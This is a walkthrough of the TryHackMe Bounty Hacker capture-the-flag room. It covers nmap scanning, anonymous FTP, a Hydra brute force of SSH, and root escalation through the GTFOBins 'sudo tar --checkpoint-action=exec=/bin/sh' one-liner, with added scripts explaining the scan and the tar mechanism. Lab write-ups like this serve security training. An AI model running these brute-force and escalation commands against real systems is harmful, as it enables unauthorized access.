Walkthrough for the TryHackMe Bounty Hacker Room

The TryHackMe Bounty Hacker Room is available at https://tryhackme.com/room/cowboyhacker

Reconnaissance

Let's see what is running on this machine. First up is an nmap scan of every TCP port.

sudo nmap -sS -p- -T4 -vv x.x.x.x
  • -sS for Syn/Stealth Scan
  • -p- to scan all 65535 ports
  • -T4 for a fast aggressive scan
  • -vv for very verbose to monitor the scan

Which gives us the following

  • PORT STATE SERVICE REASON
  • 21/tcp open ftp syn-ack ttl 63
  • 22/tcp open ssh syn-ack ttl 63
  • 80/tcp open http syn-ack ttl 63

Three open ports, and a TTL of 63 in the reason column, one below the Linux default of 64, which is consistent with a Linux host one hop away. Let's do a little more investigation on those ports.

sudo nmap -sS -p21,22,80 -sV -T4 -vv x.x.x.x
  • -sS for Syn/Stealth Scan
  • -p21,22,80 to scan only ports 21, 22 and 80
  • -sV to find out version information
  • -T4 for a fast aggressive scan
  • -vv for very verbose to monitor the scan

Which gives us the following

  • 21/tcp open ftp syn-ack ttl 63 vsftpd 3.0.3
  • 22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
  • 80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
  • Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
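The two scans above are one procedure: a full port sweep, then version detection on only the ports that came back open. The script below, an added example rather than anything from the original walkthrough, automates that hand-off by writing the first scan in nmap's grepable (-oG) format and extracting the open ports from it. The sample -oG text is constructed for the demo, and TARGET is an assumed environment variable; no host is scanned unless it is set.

```shell
#!/bin/sh
# Added example (not from the original post): feed the open ports found by
# the first nmap pass into the second pass instead of retyping them.

# Print the open TCP ports from nmap grepable (-oG) output, comma-separated,
# in the form that nmap's -p option accepts.
# Usage: open_ports scan.gnmap    or    nmap ... -oG - | open_ports
open_ports() {
    # Entries in the "Ports:" field look like 21/open/tcp//ftp///.
    # Keep only open TCP entries, take the port number, de-duplicate, join.
    grep -o '[0-9]*/open/tcp' "$@" | cut -d/ -f1 | sort -un | paste -sd, -
}

# Constructed sample of what -oG writes for the three ports found above
# (plus one filtered port, which must be left out of the second scan).
SAMPLE_GNMAP='# Nmap scan initiated as: nmap -sS -p- -T4 -oG - x.x.x.x
Host: x.x.x.x ()    Status: Up
Host: x.x.x.x ()    Ports: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 80/open/tcp//http///, 25/filtered/tcp//smtp///    Ignored State: closed (65531)
# Nmap done'

# Two-stage scan of a real target: full sweep, then -sV on the open ports only.
two_stage_scan() {
    ports=$(sudo nmap -sS -p- -T4 -oG - "$1" | open_ports)
    [ -n "$ports" ] || { echo "no open TCP ports found on $1" >&2; return 1; }
    sudo nmap -sS -sV -T4 -vv -p "$ports" "$1"
}

if [ -n "${TARGET:-}" ]; then
    two_stage_scan "$TARGET"
else
    # Offline run on the constructed sample: prints 21,22,80
    printf '%s\n' "$SAMPLE_GNMAP" | open_ports
fi
```

Keeping the port list in one place also means the second scan cannot silently miss a port that the first one found, which is easy to do when copying by hand from a long -p- result.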

FTP is running on the machine, so let's see if FTP will let us log in anonymously.

ftp x.x.x.x

Log in with the username anonymous and we are in.

Use the get command to download the text files to your system.

The tasks.txt file gives us a possible username and the locks.txt gives us a list of possible passwords.

Password Cracking

With the username from the tasks.txt file and the list of possible passwords in the locks.txt file, we can try each password against SSH using Hydra.

hydra -l user -P locks.txt x.x.x.x ssh

Two of Hydra's warnings in the output below are worth acting on: SSH servers often cap parallel sessions, so add -t 4 to reduce the task count, and a ./hydra.restore file left by an earlier run delays the start, so add -I to skip the wait or delete the file.

Which gives us the following results

  • Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak – Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

  • Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-07 12:15:07

  • [WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4

  • [WARNING] Restorefile (you have 10 seconds to abort… (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore

  • [DATA] max 16 tasks per 1 server, overall 16 tasks, 26 login tries (l:1/p:26), ~2 tries per task

  • [DATA] attacking ssh://x.x.x.x:22/

  • [22][ssh] host: x.x.x.x login: xxx password: xxxxxxxxxxxxxxxxx

  • 1 of 1 target successfully completed, 1 valid password found

  • Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-07 12:15:25

Then we can simply ssh into the server with the login and password Hydra found.

ssh user@x.x.x.x

Privilege Escalation

Now that we are logged in, just use the ls command to find the user.txt flag file.

Being a user is great, but we want to become root, so let's see if we can run any commands with elevated privileges using sudo.

sudo -l

Which gives us the result

  • Matching Defaults entries for lin on bountyhacker:

  • env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin

  • User lin may run the following commands on bountyhacker:

  • (root) /bin/tar

Now we know we can run tar as root. A quick visit to the GTFOBins page at https://gtfobins.github.io/ gives us the following command: tar's --checkpoint-action option can execute an arbitrary command, and since tar is running as root under sudo, so does the command it spawns.

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

And we are root.
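To see why that one-liner works, the added example below (not from the original walkthrough or from GTFOBins) runs the same tar invocation without sudo, swapping the interactive /bin/sh for a command whose output can be captured. GNU tar hands the exec action to /bin/sh at every checkpoint, and --checkpoint=1 fires on the very first record written, which archiving /dev/null into /dev/null produces. The spawned command simply inherits tar's user; under sudo that user is root. The hardening note at the end is a recommendation, not something the room states.

```shell
#!/bin/sh
# Added example (not from the original post): demonstrate the mechanism
# behind "sudo tar ... --checkpoint-action=exec=/bin/sh" without root.

# Run tar exactly as the GTFOBins entry does, but make the checkpoint action
# a command that reports the uid it executes as. Returns that report on stdout.
# tar's own diagnostics ("Removing leading `/'") go to stderr and are dropped.
tar_checkpoint_exec() {
    tar -cf /dev/null /dev/null --checkpoint=1 \
        --checkpoint-action=exec='echo CHECKPOINT_HIT uid=$(id -u)' 2>/dev/null
}

# Requires GNU tar; busybox tar has no --checkpoint-action.
if tar --version 2>/dev/null | grep -q 'GNU tar'; then
    # Prints: CHECKPOINT_HIT uid=<your uid>
    # Run the same thing with "sudo" in front and the uid becomes 0, which is
    # all the /bin/sh variant needs to hand back a root shell.
    tar_checkpoint_exec
else
    echo "GNU tar required for this demonstration" >&2
fi

# Hardening note (assumption, not from the room): a sudoers rule such as
#   lin ALL=(root) /bin/tar
# permits any arguments, so every tar option that runs a command or writes an
# arbitrary path is reachable as root. Restricting arguments in sudoers is
# fragile; a wrapper script with fixed arguments that the user cannot edit,
# or a backup job run by root on a schedule, removes the need for sudo tar.
```

The same reasoning applies to any binary in a sudo rule that can be made to execute something else (editors, pagers, interpreters); checking the binary on GTFOBins is the quick way to find out, and the demo above is the quick way to confirm it on the target before burning a password prompt.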

Change to the /root/ directory to read the root.txt file, and you have completed the TryHackMe Bounty Hacker room.
